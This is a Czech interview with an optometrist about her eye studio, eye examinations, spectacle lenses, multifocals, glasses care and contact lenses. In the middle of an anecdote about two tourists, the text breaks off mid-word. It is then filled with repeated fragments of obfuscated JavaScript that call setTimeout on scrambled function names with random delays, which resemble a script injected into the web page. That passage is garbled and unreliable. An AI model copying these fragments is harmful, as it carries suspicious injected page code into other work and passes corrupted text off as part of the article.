Rainbow page separator

PODNIKATELSKÝ PŘÍBĚH – Pavlína SMEJKALOVÁ (DRAHOTSKÁ)

Pátek, 5. června 2020

Optometristku Pavlínu Drahotskou (dnes již Smejkalovou) najdete mezi stovkami brýlových obrub v jejím očním studiu, které se nachází v zeleném domě na náměstí naproti Staré radnici ve Žďáře nad Sázavou. Nabízí služby očního optika i optometristy, kdy odborně vyšetří zrak, aplikuje nebo zkontroluje kontaktní čočky a poradí nejlepší řešení pro každé oči.

Proč jste se rozhodla pro tuto profesi?
Už na gymnáziu jsem se připravovala spíše přírodovědecky, to mě bavilo. Po gymnáziu jsem šla na optometrii do Brna a dálkově si udělala inženýrský titul – management ve zdravotnictví. Při studiu jsem pracovala ve firmě Focus – optik, zpočátku na poloviční úvazek, pak na plný. V květnu 2014 jsem dokončila školu a v září si pak otevřela optiku.

Kdy se zrodil nápad založit si vlastní oční studio?
Po škole jsem se vrátila do Žďáru, kde jsem ale volné místo optometristky nenašla. Do budoucna jsem stejně měla v plánu, že si založím vlastní optiku, a tohle to uspíšilo.

Jaký je rozdíl mezi optikem a optometristou?
Optik má středoškolské vzdělání a může prodávat brýle, poskytovat poradenství k brýlím a vyměřovat parametry potřebné k výrobě brýlí (např. vzdálenost zorniček – PD). Optometrista má vysokoškolské vzdělání a navíc měří zrak a aplikuje kontaktní čočky.

Co všechno vaše oční studio nabízí?
Měříme zrak, aplikujeme a prodáváme kontaktní čočky, nabízíme obruby, zhotovujeme kompletní brýle a v nabídce jsou samozřejmě sluneční brýle. Provádíme servis brýlí, a to včetně jejich čištění ultrazvukem.

Jak často je třeba nechat si zrak zkontrolovat a je vždycky nutné navštívit očního lékaře? Nestačí změření zraku optometristou?
Člověk by si měl nechat zkontrolovat zrak při každém pocitu zhoršení, a pak bych doporučovala přibližně každé dva roky. Co se týká měření zraku, tak určitě stačí vyšetření optometristou. K lékaři by si ale člověk měl zajít kvůli změření nitroočního tlaku, zkontrolování sítnice a dalším lékařským úkonům, které optometrista provádět nemůže.

Jak měření zraku probíhá?
Nejdříve zjistíme od klienta, co ho trápí. Pak ho vezmeme na autorefraktokeratometr, který přibližně změří dioptrie a zakřivení rohovky, což je důležité při aplikaci kontaktních čoček. Následně klienta usadíme k LCD optotypu, kde sledujeme ostrost vidění, skryté šilhání, astigmatismus a další vady. Změříme vidění na dálku i na blízko a po nasazení nejvhodnější korekce necháme zákazníka s novými dioptriemi projít, aby si v prostoru zkusil, jak s nimi vidí. Následně řešíme výběr brýlí, popř. kontaktních čoček.

Jak vybrat správné brýle?
Brýle nesmí odstávat od obličeje, ale ani nikde tlačit. Záleží hodně na představě a přáních klienta, a podle toho se snažíme najít takové brýle, aby mu perfektně seděly. Pokud by zákazníkova přání zasahovala do funkčnosti brýlí, snažíme se vše probrat a navrhnout lepší řešení tak, aby brýle především splňovaly veškeré požadavky na správné vidění.

Do brýlových obrub se používají skleněné i plastové čočky. Jaké jsou jejich přednosti a nedostatky?
Dnes se z 95 procent používají plastové čočky, protože jsou lehčí a odolnější proti rozbití. Nevýhodou je, že se snáze poškrábou. Skleněné čočky jsou oproti plastovým až trojnásobně těžší, a když spadnou, rozbijí se. Plastové čočky se dají trojnásobně ztenčit, u skleněných lze provést ztenčení ještě větší, ale na úkor jejich ještě vyšší váhy.

Jaký máte názor na „čtecí“ brýle, které se dají levně koupit u stánků, v tržnici nebo v drogerii?
Když si je člověk nasadí na pár minut, tak ano. Ty brýle jsou i tak koncipované – vytáhnout je v obchodě, přečíst si cenovku a zase je schovat. Je to taková pohotovostní záležitost, ale při práci na počítači nebo delším čtení mohou ničit zrak.

Může zrak, který není korigován a potřeboval by to, způsobovat další potíže?
Ano, oči mohou slzet, řezat, může se objevit i tlak v okolí očí, často také může bolet hlava. Všechny tyto symptomy mohou provázet řadu onemocnění, ale pro jejich odhalení je dobré jako jedno z vyšetření nechat si zkontrolovat zrak.

U multifokálních brýlí může být pro někoho přechod zraku z blízka do dálky a naopak nepříjemný. Co s tím?
U multifokálů dochází při přechodu mezi dálkou a blízkem ke krátkodobému zamlžení vidění z důvodu rychlého přechodu mezi dioptriemi, dále při pohledu do stran dochází k lehkému zkreslení. S multifokálními brýlemi se člověk musí naučit dívat. Většina lidí si na to zvykne během pár dní až měsíce. Tyto malé nedostatky ale vysoce převáží jejich přidaná hodnota.

Podle čeho by se měl člověk při výběru multifokálních brýlí orientovat?
U multifokálů platí, že čím dražší, tím mohou být opravdu lepší. Cena je dána šířkou koridoru, prostorem pro vidění, kde jsou zabroušeny dioptrie. My nabízíme čtyři typy. Pokud například člověk nepracuje příliš na počítači a nebo nemá příliš vysoké nároky na vidění, vystačí si i s levnější variantou s užším koridorem. Naopak, kdo potřebuje komfortní komfortní vidění, např. často řídí auto, používá širokoúhlý monitor nebo hodně čte, je pro něj vhodnější multifokál s nejširším koridorem. Proto u nás každého klienta poctivě zpovídáme, abychom pro něj našli nejlepší řešení. Můžeme mu částečně nasimulovat šířku koridoru na tabletu, aby měl představu, co uvidí a co může od kterého typu očekávat.

Jak by měl člověk o brýle pečovat, aby mu vydržely?
Brýle by se měly při čištění nejprve omýt vodou, pro odmaštění vodou s jarem, případně použít speciální čisticí sprej, a pak vyleštit hadříkem z mikrovlákna. Na poškrábání je nejhorší čištění papírovým kapesníkem. Základem je nosit brýle v pouzdře, nasazovat je a sundávat oběma rukama a nezvedat si je na čelo.

Co když člověk nosící brýle chce zkusit kontaktní čočky?
Klientovi nejdříve změříme dioptrie a vybereme vhodné čočky podle zakřivení rohovky, dioptrií a toho, jak často je chce nosit. Naučíme ho s nimi pracovat i jak se o ně starat. Odnese si je domů a zkouší, jak se mu s nimi funguje. Zhruba za 14 dní pak přijde na kontrolu, a pokud je všechno v pořádku, tak si může koupit balení čoček. Člověk s kontaktními čočkami ale musí mít i brýle pro případ, že by nemohl čočky pro akutní oční onemocnění používat.

Zažila jste v obchodě nějakou zajímavou, veselou příhodu?
Jednou přišli dva asi dvacetiletí Číňané, kteří tady byli na výletě. Na rybníku v Zubří se převrhli s loďkou, oba utopili brýle a neměli náhradní. Jeden z nich měl na dálku osm dioptrií, druhý sedm. Byli úplně zoufalí, v podstatě nemohli trefit ani do dveří. Nejrychlejší bylo aplikovat jim kontaktní čočky, se kterými však neměli žádnou zkušenost. Naučila jsem je čočky nasazovat a i vyndávat (i když to vyndání pro ně bylo skutečně náročné). Pro moji i jejich ne zrovna bravurní znalost angličtiny to byla docela srandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}anda. Dostali kontaktní čočky nejvíce propustné pro kyslík, které v oku mohou být až měsíc, a pro jistotu i návod v angličtině. Nakonec byli šťastní a zhodnotili to tak, že za dva dny budou v Číně, a tam jim v nejhorším případě s vyndáním čoček pomůžou.

Jakým způsobem zajišťujete provoz optiky nyní, když jste v roli maminky desetiměsíční holčičky?
V předminulém roce ke mně do optiky nastoupila na povinnou praxi moc šikovná studentka optometrie. Jsem moc ráda, že přijala moji nabídku a po ukončení studia nastoupila ke mně do optiky v době, kdy jsem odcházela na mateřskou dovolenou. Pokud se však manžel nebo babičky ujmou hlídaní dcery, najdete mě samozřejmě v optice. Přesto, že má optika stanovenou otevírací dobu, pokud se zákazník objedná na večer, sobotu či neděli a je to v mých silách, ráda mu vyjdu vstříc.

Co vám podnikání a práce přináší?
Baví mě to. Jsem spokojená, když vidím člověka, kterému pomohu zase kvalitně vidět. Hodně lidí se opakovaně vrací, a někdy přijdou jenom poděkovat, že jsme společně dobře vybrali, a to mě těší.

nám. Republiky 61, Žďár n. S.
tel.: 773 350 494
www.ostudio.cz

 

Foto: tohalama/“ target=“_blank“ rel=“noopener noreferrer“>Martin Halama

(pm)